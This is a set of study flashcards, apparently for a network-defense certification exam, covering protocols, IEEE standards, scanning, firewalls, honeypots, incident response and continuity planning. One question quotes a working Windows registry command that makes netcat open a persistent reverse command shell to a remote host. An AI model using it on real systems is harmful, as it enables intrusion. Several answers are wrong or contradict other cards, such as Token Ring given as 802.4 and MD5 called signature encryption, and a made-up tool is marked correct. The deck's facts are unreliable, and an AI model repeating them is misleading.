Study CND Flashcards by Eric Cobain

What is the bit size of the Next Header field in the IPv6 header format?

8 Bits

How well did you know this?

Not at all

Perfectly

Which of the following is a presentation layer protocol?
A. TCP
B. RPC
C. BGP
D. LWAPP

Answer: D

LWAPP

How well did you know this?

Not at all

Perfectly

What IEEE standard is Fast Basic Service Set Transition? And what does it do?

802.11r is the standard to permit continuous connectivity aboard wireless devices in motion, with fast and secure handoffs from one base station to another, managed in a seamless manner.

How well did you know this?

Not at all

Perfectly

__________ is a congestion control mechanism that is designed for unicast flows operating in an Internet environment and competing with TCP traffic?

TCP Friendly Rate Control

How well did you know this?

Not at all

Perfectly

What is the IEEE-SA for wireless personal area networks?

802.15

How well did you know this?

Not at all

Perfectly

Which layer performs routing of IP datagrams?

Internet Layer

How well did you know this?

Not at all

Perfectly

Which of the following layers performs routing of IP datagrams?
A. Transport layer
B. Link layer
C. Application layer
D. Internet layer

Internet layer

Answer: D

How well did you know this?

Not at all

Perfectly

Which of the following standards defines Logical Link Control (LLC)?
A. 802.2
B. 802.3
C. 802.5
D. 802.4

802.2

Answer: A

How well did you know this?

Not at all

Perfectly

Which of the following protocols supports source-specific multicast (SSM)?
A. DHCP
B. ARP
C. DNS
D. BGMP

BGMP

Answer: D

How well did you know this?

Not at all

Perfectly

Token Ring is standardized by which of the following IEEE standards?
A. 802.2
B. 802.4
C. 802.3
D. 802.1

802.4 is the standard for Token Ring

Answer: B

How well did you know this?

Not at all

Perfectly

Which of the following is an example of a network providing DQDB access methods?
A. IEEE 802.3
B. IEEE 802.2
C. IEEE 802.4
D. IEEE 802.6

802.6 - Local and Metropolitan Area Networks: Distributed Queue Dual Bus (DQDB) Subnetwork of a Metropolitan Area Network (MAN)

Answer: D

How well did you know this?

Not at all

Perfectly

Which of the following IEEE standards defines the demand priority access method?
A. 802.15
B. 802.3
C. 802.12
D. 802.11

802.12

Answer: C

has to do with 100 Mbit Wifi on demand access. Probably not on the test. MAN

How well did you know this?

Not at all

Perfectly

Which of the following IEEE standards adds QoS features and multimedia support?
A. 802.11b
B. 802.11e
C. 802.5
D. 802.11a

802.11e

Answer: B

How well did you know this?

Not at all

Perfectly

Which of the following OSI layers is sometimes called the syntax layer?

Presentation layer

How well did you know this?

Not at all

Perfectly

Which of the following IEEE standards defines the token passing ring topology?
A. 802.4
B. 802.5
C. 802.3
D. 802.7

802.5

Answer: B

How well did you know this?

Not at all

Perfectly

Which of the following IEEE standards defines a physical bus topology?
A. 802.4
B. 802.5
C. 802.6
D. 802.3

802.4

Answer: A

How well did you know this?

Not at all

Perfectly

Which of the following fields in the IPv6 header replaces the TTL field in the IPv4 header?
A. Next header
B. Traffic class
C. Hop limit
D. Version

Hop Limit

Answer: C

How well did you know this?

Not at all

Perfectly

What is the response of an Xmas scan if a port is either open or filtered?
A. RST
B. No response
C. FIN
D. PUSH

NO Response

Answer: B

How well did you know this?

Not at all

Perfectly

CSMA/CD is specified in which IEEE standard?

802.3

How well did you know this?

Not at all

Perfectly

Which of the following protocols sends a jam signal when a collision is detected?

CSMA/CD

How well did you know this?

Not at all

Perfectly

Which of the following protocols is used in wireless networks?
A. CSMA
B. CSMA/CD
C. ALOHA
D. CSMA/CA

CSMA/CA

Answer: D

How well did you know this?

Not at all

Perfectly

TCP SYN scanning is also known as

half-open scanning

How well did you know this?

Not at all

Perfectly

You are a professional Computer Hacking forensic investigator. You have been called to collect
evidences of buffer overflow and cookie snooping attacks. Which of the following logs will you
review to accomplish the task?
A. Program logs
B. Web server logs
C. Event logs
D. System logs

A. Program logs

C. Event logs
D. System logs

Answer: D, C, and A

How well did you know this?

Not at all

Perfectly

Jason diagnoses the internals of his computer and observes that some changes have
been made in Sam’s computer registry. To rectify the issue, Jason has to restore the registry. Which of
the following utilities can Jason use to accomplish the task? Each correct answer represents a
complete solution. Choose all that apply.
A. Reg.exe
B. EventCombMT
C. Regedit.exe
D. Resplendent registrar

A. Reg.exe

C. Regedit.exe
D. Resplendent registrar

How well did you know this?

Not at all

Perfectly

The Distance Vector Multicast Routing Protocol (DVMRP) is used to ...

share information between routers to transport IP Multicast packets among networks.

______________ is an enumeration technique used to glean information about computer systems on a network and the services running its open ports.

Banner Grabbing

The Data Link Switching Client Access Protocol (DCAP) is an application layer protocol that is used between workstations and routers for

transporting SNA/NetBIOS traffic over | TCP sessions.

Honeynet is a prime example of

a high-interaction honeypot.

Two or more honeypots on a network | form a

honeynet.

Which of the following steps of the OPSEC process examines each aspect of the planned operation to identify OPSEC indicators that could reveal critical information and then compare those indicators with the adversary's intelligence collection capabilities identified in the previous action? A. Analysis of Threats B. Application of Appropriate OPSEC Measures C. Identification of Critical Information D. Analysis of Vulnerabilities E. Assessment of Risk

D. Analysis of Vulnerabilities Analysis of Vulnerabilities: It includes examining each aspect of the planned operation to identify OPSEC indicators that could reveal critical information and then comparing those indicators with the adversary's intelligence collection capabilities identified in the previous action

``` Which of the following protocols is used for inter-domain multicast routing and natively supports "source-specific multicast" (SSM)? A. BGMP B. DVMRP C. OSPF D. EIGRP ```

BGMP BGMP stands for border gateway multicast protocol. It is used for inter-domain multicast routing and natively supports "source-specific multicast" (SSM). In order to support "any-source multicast" (ASM), BGMP builds shared trees for active multicast groups. This allows domains to build sourcespecific, inter-domain, distribution branches where needed. BGMP uses TCP as its transport protocol, which helps in eliminating the need to implement message fragmentation, retransmission, acknowledgement, and sequencing.

What did the 802.11e enhancement to 802.a and 802.b provide?

QOS prioritization of voice data video transmissions

Which of the OSI Seven Layers establishes, manages terminates connections between local and remote applications.

Session

Which of the following are used as a cost estimating technique during the project planning stage? Each correct answer represents a complete solution. Choose three. A. Function point analysis B. Program Evaluation Review Technique (PERT) C. Expert judgment D. Delphi technique

D. Delphi technique C. Expert judgment A. Function point analysis

Which of the following IP class addresses are not allotted to hosts

Class D 224 - 239 reserved for multicasting | Class E 240 -255 experimental

Which of the following IEEE standards provides specifications for wireless ATM systems?

802.11a

Which of the following is the type of documented business rule for protecting information and the systems, which store and process the information A. Information protection policy B. Information protection document C. Information storage policy D. Information security policy

Information security policy

``` Which of the following UTP cables supports transmission up to 20MHz? A. Category 2 B. Category 5e C. Category 4 D. Category 1 ```

Category 4

``` Which of the following is also known as slag code? A. Trojan B. Logic bomb C. Worm D. IRC bot ```

Logic Bomb

``` Which of the following is susceptible to a birthday attack? A. Authentication B. Integrity C. Authorization D. Digital signature ```

Digital Signature

``` Which of the following wireless networks provides connectivity over distance up to 20 feet? A. WMAN B. WPAN C. WLAN D. WWAN ```

WPAN

``` Which of the following networks interconnects devices centered on an individual person's workspace? A. WLAN B. WPAN C. WWAN D. WMAN ```

WPAN

``` Which of the following is a symmetric 64-bit block cipher that can support key lengths up to 448 bits? A. HAVAL B. BLOWFISH C. IDEA D. XOR ```

Blowfish

``` Which of the following protocols is used to exchange encrypted EDI messages via email? A. S/MIME B. MIME C. HTTP D. HTTPS ```

S/MIME

``` Which of the following are provided by digital signatures? A. Identification and validation B. Authentication and identification C. Integrity and validation D. Security and integrity ```

Authentication and Validation

``` Which of the following is a passive attack? A. Unauthorized access B. Traffic analysis C. Replay attack D. Session hijacking Answer: B ```

Traffic Analysis

``` Which of the following is a malicious program that looks like a normal program? A. Impersonation B. Worm C. Virus D. Trojan horse ```

Trojan Horse

``` Which of the following is an IPSec protocol that can be used alone in combination with Authentication Header (AH)? A. L2TP B. PPTP C. ESP D. PPP ```

ESP Encapsulating Security Payload protocol

``` Which of the following attacks combines dictionary and brute force attacks? A. Replay attack B. Man-in-the-middle attack C. Hybrid attack D. Phishing attack ```

Hybrid Attack

``` Which of the following attacks comes under the category of an active attack? A. Replay attack B. Wireless footprinting C. Passive Eavesdropping D. Traffic analysis ```

Replay Attack

``` Which of the following encryption techniques do digital signatures use? A. MD5 B. RSA C. Blowfish D. IDEA ```

MD5

``` Which of the following header fields in TCP/IP protocols involves Ping of Death attack? A. SMTP header field B. TCP header field C. IP header field D. UDP header field ```

TCP Header Field

``` Which of the following modems offers wireless communication under water? A. Controllerless modem B. Short haul modem C. Acoustic modem D. Optical modem ```

Acoustic modem

Which of the following protocols is used by the Remote Authentication Dial In User Service (RADIUS) client/server protocol for data transmission? A. DCCP B. FTP C. FCP D. UDP

UDP

``` Which of the following applications is used for the statistical analysis and reporting of the log files? A. Sawmill B. Sniffer C. Snort D. jplag ```

Sawmill

``` Which of the following is a Cisco product that performs VPN and firewall functions? A. Circuit-Level Gateway B. PIX Firewall C. IP Packet Filtering Firewall D. Application Level Firewall ```

PIX Firewall

``` Which of the following is also known as stateful firewall? A. PIX firewall B. Stateless firewall C. DMZ D. Dynamic packet-filtering firewall ```

Dynamic packet-filtering firewall

``` Which of the following is a centralized collection of honeypots and analysis tools? A. Production honeypot B. Honeynet C. Research honeypot D. Honeyfarm ```

Honeyfarm

``` Which of the following routing metrics is the sum of the costs associated with each link traversed? A. Routing delay B. Communication cost C. Bandwidth D. Path length ```

Path Length

``` Which of the following honeypots is a useful little burglar alarm? A. Backofficer friendly B. Specter C. Honeynet D. Honeyd ```

Backofficer friendly

``` What is the location of honeypot on a network? A. Honeyfarm B. Honeynet C. Hub D. DMZ ```

DMZ

``` Which of the following is an open source implementation of the syslog protocol for Unix? A. syslog-os B. syslog Unix C. syslog-ng D. Unix-syslog ```

syslog-ng

``` Which of the following protocols is a more secure version of the Point-to-Point Tunneling Protocol (PPTP) and provides tunneling, address assignment, and authentication? A. IP B. L2TP C. PPP D. DHCP ```

L2TP

``` Which of the following sets of incident response practices is recommended by the CERT/CC? A. Prepare, notify, and follow up B. Notify, handle, and follow up C. Prepare, handle, and notify D. Prepare, handle, and follow up ```

Prepare, handle, and follow up

``` Which of the following tools scans the network systems for well-known and often exploited vulnerabilities? A. Nessus B. SAINT C. SATAN D. HPing ```

SATAN

``` Which of the following tools examines a system for a number of known weaknesses and alerts the administrator? A. Nessus B. COPS C. SATAN D. SAINT ```

COPS

Which of the following is the full form of SAINT? A. System Automated Integrated Network Tool B. Security Admin Integrated Network Tool C. System Admin Integrated Network Tool D. System Administrators Integrated Network Tool

System Administrators Integrated Network Tool

``` Which of the following is a type of VPN that involves a single VPN gateway? A. Remote-access VPN B. Extranet-based VPN C. PPTP VPN D. Intranet-based VPN ```

Extranet-based VPN

``` Which of the following is a free security-auditing tool for Linux? A. SAINT B. SATAN C. Nessus D. HPing ```

Nessus

``` Which of the following types of RAID is also known as disk striping? A. RAID 0 B. RAID 2 C. RAID 1 D. RAID 3 ```

RAID 0

``` Which of the following is a process of transformation where the old system can no longer be maintained? A. Disaster B. Risk C. Threat D. Crisis ```

Crisis

``` Which of the following phases is the first step towards creating a business continuity plan? A. Business Impact Assessment B. Scope and Plan Initiation C. Business Continuity Plan Development D. Plan Approval and Implementation ```

Scope and Plan Initiation

``` Which of the following types of RAID offers no protection for the parity disk? A. RAID 2 B. RAID 1 C. RAID 5 D. RAID 3 ```

RAID 3

``` Which of the following processes helps the business units to understand the impact of a disruptive event? A. Plan approval and implementation B. Business continuity plan development C. Scope and plan initiation D. Business impact assessment ```

Business impact assessment

``` Which of the following is a network analysis tool that sends packets with nontraditional IP stack parameters? A. Nessus B. COPS C. SAINT D. HPing ```

HPING

``` Which of the following protocols is a method of implementing virtual private networks? A. OSPF B. PPTP C. IRDP D. DHCP ```

PPTP

Which of the following attacks are computer threats that try to exploit computer application vulnerabilities that are unknown to others or undisclosed to the software developer? Each correct answer represents a complete solution. Choose all that apply. A. Buffer overflow B. Zero-day C. Spoofing D. Zero-hour

Zero Day and Zero Hour

Which of the following is a service discovery protocol that allows computers and other devices to find services in a local area network without prior configuration? A. NTP B. SLP C. NNTP D. DCAP

SLP | Service Location Protocol

In L2TP ______________ tunnel mode, the ISP must | support L2TP, whereas in L2TP tunnel mode, the ISP does not need to support L2TP.

compulsory

``` Which of the following tools examines a system for a number of known weaknesses and alerts the administrator? SAINT Nessus SATAN COPS ```

Should have chosen | COPS

Which of the following routing metrics refers to the length of time that is required to move a packet from source to destination through the internetwork? Bandwidth Path length Routing Delay Load

Routing Delay

Your company is outgrowing its current facility and plans to relocate within the next year. You need to provide management with guidance on selecting an appropriate new location. You are compiling a list of location considerations. Which is NOT a consideration. proximity to roads neighboring buildings emergency exits utility systems

emergency exits

You are designing the site-to-site VPN topology. You want to connect all branches to the main office while preventing direct connections between branch offices. Which topology should you choose? hub and spoke star mesh ring

star

You have been hired to help a company increase its network defense. You discover that there are currently no restrictions on Internet or remote access usage on the company's network. Which type of Internet access policy is currently implemented? Paranoid Prudent Permissive Promiscuous

Promiscuous

Recently, an attacker was able to connect to a wireless access point as a client and eavesdrop on the traffic to obtain address information. Which type of wireless attack has occurred? ad-hoc connection attack AP MAC spoofing misconfigured access point attack evil twin attack

AP MAC spoofing

In the process of evaluating the QoS features of VPN products, you become concerned with the ratio of data packets sent versus all packets. What is this called? packet loss Delay Jitter Goodput

Goodput

``` You are using Nmap to perform a vulnerability assessment. Which of the following procedures would help to create a map of the network? ping sweep Service discovery port scan OS fingerprinting ```

ping sweep

Which of the following third party encryption tools can perform on the fly encryption (OTFE)? Open Puff AxCrypt Wireshark Veracrypt

Veracrypt

You would like to connect your sniffer to a switch and capture all traffic going through the switch. Which of the following features could you use? ``` VTP 802.1q DAI RAP STP SPAN ```

RAP SPAN

During which stage of the IH&R process is a vulnerability analysis performed? Eradication and Recover Post-Incident Activities Forensic Investigation Containment

Eradication and Recover

With which of the following flag sets does the Xmas tree scan send a TCP frame to a remote device? Response: RST PUSH FIN URG

PUSH FIN URG

Which of the following is the logical entity that enables programming code or software to operate in a virtualization solution? Response: virtual machine hypervisor execution environment host operating system

execution environment

What is the second phase in the vulnerability management process? Remediation Asset prioritization Verification Assessment

Asset prioritization

Which of the following are the responsibilities of the disaster recovery team? correct answer represents a complete solution. Choose all that apply. To modify and update the disaster recovery plan according to the lessons learned from previous disaster recovery efforts To initiate the execution of the disaster recovery procedures To monitor the execution of the disaster recovery plan and assess the results To notify management, affected personnel, and third parties about the disaster

To modify and update the disaster recovery plan according to the lessons learned from previous disaster recovery efforts To initiate the execution of the disaster recovery procedures To monitor the execution of the disaster recovery plan and assess the results To notify management, affected personnel, and third parties about the disaster

You are deploying a network IDS, and your main concern is to monitor surges in traffic that may indicate a DoS attack. Where should you place the sensors? in the DMZ on major backbones on critical subnets behind the external firewall

on major backbones

Which wireless IPS will raise its risk indicator to 100% if an AP were discovered to be running with no encryption?

AirMobile Server

You run the following command on the remote Windows server 2003 computer: c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe" What task do you want to perform by running this command? Response: You want to put Netcat in the stealth mode. You want to set the Netcat to execute command any time. You want to perform banner grabbing. You want to add the Netcat command to the Windows registry.

You want to put Netcat in the stealth mode. You want to set the Netcat to execute command any time. You want to add the Netcat command to the Windows registry.

Management is concerned that your Linux email server can become the victim of a DoS attack. Which of the following hardening recommendations will help reduce this possibility? Use DNSBL servers. Activate SPF. Configure reverse DNS lookup. Limit the number of connections.

Limit the number of connections.

Management is concerned that an attacker will be able to access the /etc/shadow password file on a Linux server. When the Linux server was installed, the default permissions for this file were used. For this reason, you are not concerned. What are the default permissions for this file? 500 400 600 700

400

You may need to know how to change permissions in numeric code in Linux, so to do this you use numbers instead of “r”, “w”, or “x”. What are the eight permission combinations of Owner, Group, User ``` 0 = No Permission 1 = Execute 2 = Write 4 = Read ```

Permission numbers are: ``` 0 = --- 1 = --x 2 = -w- 3 = -wx 4 = r- 5 = r-x 6 = rw- 7 = rwx ``` example chmod 744

Which of the following protocols is used for exchanging routing information between two gateways in a network of autonomous systems? IGMP EGP OSPF ICMP

OSPF

Which of the following functions becomes possible when using quantitative risk analysis? risk elimination cost/benefit analysis risk prioritization risk identification

Cost/Benefit analysis

Which of the following standards does a cloud service provider has to comply with, to protect the privacy of its customer’s personal information? ISO/IEC 27020 ISO/IEC 27021 ISO/IEC 27018 ISO/IEC 27019

ISO/IEC 27018

Which group in ISO/IEC 27001 includes communications security controls? Response: A.6 A.15 A.5 A.13

A.13

Which wireless discovery tool uses the Windows command netsh wlan show networks mode=bssid to get wireless information? NetStumbler Vistumbler InSSIDer NetSurveyor

Vistumbler

Business Coninuity Plan

provides measures for sustaining essential business operations while recovering from significant disruption

Business Recovery Plan

provides measures for recovering business operations immediately following a disaster

Continuity of Operation plan

provides measures and capabilities to maintain organizational essential, strategic functions at an alternate site for up to 30 days

It provides measures and capabilities for recovering a major application or general support system.

Contingency Plan

It provides measures for disseminating status report to personnel and the public

Crisis Commuication Disaster recovery planPlan

It provides detailed measures to facilitate recovery of capabilities at an alternate site.

Disaster recovery plan

What are the three layers of computer network defense (CND)? people, assets, and technology assets, operations, and technology people, operations, and technology people, operations, and assets

people, operations, and technology

In which phase of the NIST Risk Management framework are security controls tailored to the needs of the organization? Authorize Select Categorize Monitor

Select

Which of the following is a maintenance protocol that permits routers and host computers to swap basic control information when data is sent from one computer to another? BGP ICMP SNMP IGMP

ICMP

You are assessing security needs for several hosts according to their purpose in the network. Which of the following factors would NOT affect security considerations for the hosts? network services provided by the host category of information stored on the host operating system of the host security requirements needed for information

operating system of the host

Which sniffing tool is a command-line tool? Dsniff Capsa Tcpdump ColaSoft

tcpdump

Sally needs to encrypt a document so that only Bob can decrypt it. What key should she use for this? Bob's public key Sally's public key Sally's private key Bob's private key

Bob's Public Key

Which of the following is true of security policies and baselines? Security policies define the structure of the baseline. Baselines define the structure of the security policy. Policies are specific to the operating system. Baselines are not specific to the operating system.

Baselines define the structure of the security policy

Which of the following is NOT an IDS system? Peek and Spy Snort Vanguard Enforcer KFSensor

KFSensor (windows IPS)

Identify the firewall technology that monitors the TCP handshake between the packets to determine whether a requested session is legitimate. Packet Filtering Firewall Circuit Level Gateway Stateful Multilayer Inspection Network Address Translation

Circuit Level Gateway

During IH&R, the____________and containment processes can run at the same time. Solution : forensic analysis or forensic investigation Determine whether the given solution is correct? Response: Correct OR ? Incorrect

correct

During which phase of the vulnerability management process are rogue devices typically discovered? Asset Prioritization Discovery Reporting Assessment

Discovery

Which of the following does NOT occur during the Post-incident Activity stage of IH&R? Perform a damage assessment and document incident costs. Update the incident handling policy. Return the affected system to normal operation.

Return the affected system to normal operation.

In which of the following levels of vulnerability management does scanning occur? Assessment Discovery Asset prioritization Remediation

Assessment

At what layer of the OSI model do packet-filtering firewalls operate? Layers 2 and 3 Layers 4 and 5 Layers 5 and 6 Layers 3 and 4

Layers 3 and 4

Which of the following is a standard-based protocol that provides the highest level of VPN security? PPP IPSec L2TP IP

IPSec

Which of the following forensic investigation roles examines the evidence acquired and determines what is useful to the investigation? incident analyser expert witness evidence manager evidence investigator

evidence investigator

Which of the following should the first responder document prior to escalating an incident? handling procedures data about the affected system containment actions IRT contact information

data about the affected system

Your sniffer just detected one device sending another a packet with the SYN flag set in the TCP header. What flags would you expect to be set in the packet the receiving device sends back to the sender? SYN ACK SYN and ACK RST

SYN and ACK

Which tool ensures integrity of system files though the use of a cron job? Trustwave Tripwire Code Green Networks TrueDLP McAfee Total Protection for Data Loss

Tripwire

Which policy defines the data sensitivity labels and the guidelines for processing, storing, and transmitting sensitive data? acceptable use policy network connection policy information protection policy information system security policy

information protection policy

Which of the following firewalls are used to track the state of active connections and determine the network packets allowed to enter through the firewall? Each correct answer represents a complete solution. Choose all that apply. Dynamic packet-filtering Stateful Proxy server Circuit-level gateway

Dynamic packet-filtering and | Statefull

The Tripwire tool is used for what function? file integrity verification intrusion detection data loss prevention log collection

file integrity verification

Which phase of vulnerability management deals with the actions for patching the discovered vulnerabilities? Verification Mitigation Remediation Assessment

Remediation

Which of the following is a mandatory password-based and key-exchange authentication protocol? DH-CHAP PPP CHAP VRRP

DH-CHAP

You use the following filter in Wireshark: (tcp.flags==0x02) && (tcp.window_size <1025) What type of traffic is the filter trying to locate? TCP ACK scans TCP SYN scans OS fingerprinting TCP SYN ACK packets

OS fingerprinting

Which of the following IDS tools performs packet filtering using Berkeley Packet Filtering commands? AIDE SNARE Vanguard Enforcer Snort

Snort

Your company recently implemented an internal public key infrastructure (PKI). Because you need to ensure that all of the PKI components are secure, you are currently researching the vulnerabilities of the entity that signs the certificates. Which entity are you examining? a principal a verifier an issuer a subject

an issuer

Which of the following is NOT a suspicious TCP packet? one with only the SYN flag set and data one with the SYN and FIN flags set one with the destination port of zero one with only the SYN flag set and no data

one with only the SYN flag set and no data

Which of the following tools is used to ping a given range of IP addresses and resolve the host name of the remote system? Nmap SuperScan Netscan Hping

Superscan

Your company decides to implement a new wireless network for employees who use mobile devices. You have been asked to determine which wireless deployment will provide the fastest throughput. Which of the following should you recommend? 802. 11g 802. 11ac 802. 11n 802. 11ad

802.11ad

Which Wi-Fi discovery tool is built specifically for the Apple MAC OS? Aircheck Wi-Fi tester Xirrus -Fi Inspector AirRadar 2 Wellenreiter

AirRadar 2

Your company implements an authentication mechanism on their website whereby customers need to enter the hidden letters in a distorted image to confirm their identity. Which type of knowledge factor authentication is being used? PIN challenge response Passphrase security question

Challenge Response

What is the third step in the patch management process? Assess Deploy Detect Acquire

Acquire

Which of the following can only be done with an asymmetric algorithm? data integrity digital signature generate hash values data encryption

digital signature

Which of the following statements are NOT true about the FAT16 file system? correct answer represents a complete solution. Choose all that apply. It does not support file-level security. It supports file-level compression. It works well with large disks because the cluster size increases as the disk partition size increases. It supports the Linux operating system.

It supports file-level compression. It works well with large disks because the cluster size increases as the disk partition size increases.

During which stage of the IH&R process is a vulnerability analysis performed? ``` Post-Incident Activities Eradication and Recover Forensic Investigation Containment Eradication and Recover ```

Eradication and Recover

Which of the following protocols is used to share information between routers to transport IP Multicast packets among networks? Response: LWAPP DVMRP RSVP RPC

DVMRP Distance Vector Multicast Routing Protocol

Which of the following is true of content-based signatures? Response: Signatures are in packet payloads. Signatures are in packet headers. Packet analysis is enough to detect signatures. Multiple packet analysis is required.

Signatures are in packet payloads.

Which computer network defense (CND) approach examines the root cause or reasons for network attacks? detective approach retrospective approach preventive approach reactive approach

Should have chosen | retrospective appoach

Which of the following is a Unix and Windows tool capable of intercepting traffic on a network segment and capturing username and password? Aircrack Ettercap BackTrack AirSnort

Ettercap

You are reviewing your company's application development policies. Which of the following should NOT be part of this? Use standard application configuration baselines during development. Implement secure coding review. Ensure only authorized personnel can install software on all hosts. Use standard secure coding practices and principles during development.

Use standard application configuration baselines during development.

You need to test the strength of the WPA PSK password used in your WLAN. Which tool could you use for this? Net Surveyor NetStumbler Vistumbler Wireless Security Auditor

Wireless Security Auditor

Promiscuous

Which of the following protocols uses a control channel over TCP and a GRE tunnel operating to encapsulate PPP packets? PPTP SSTP ESP LWAPP

PPTP

Which of the following does NOT affect the severity of an incident? service criticality incident impact incident duration information confidentiality

information confidentiality

Which of the following sniffers can operate on multi-network cards, such as ISDN and ADSL? Dsniff Capsa ColaSoft Packet Sniffer Colasoft Network Sniffer

Should have chosen | ColaSoft Packet Sniffer

In which of the following transmission modes is communication uni-directional? Full-duplex mode Half-duplex mode Root mode Simplex mode

Simplex Mode

You suspect an attacker recently performed a UDP scan of the network. You would like to look for traffic that would verify this. How should you set the filter in Wireshark? icmp. type==3 and ICMP code==3 tcp. flags== 0x003 udp. dtspport==7 icmp. type==8

icmp.type==3 and ICMP code==3

Which of the following is a network interconnectivity device that translates different communication protocols and is used to connect dissimilar network technologies? Switch Gateway Bridge Router

Gateway

Which of the following is the primary international body for fostering cooperative standards for telecommunications equipment and systems? IEEE CCITT ICANN NIST

CCITT

At which level of virtualization does SAN technology operate? file system storage device Fabric server

Fabric

Which of the following recovery plans includes specific strategies and actions to deal with specific variances to assumptions resulting in a particular security problem, emergency, or state of affairs? Contingency plan Continuity of Operations Plan Business continuity plan Disaster recovery plan

Contingency plan

Which of the risk management phases is the context in which the risk exists determined? Risk treatment Risk assessment Risk monitoring and review Risk identification

Risk Identification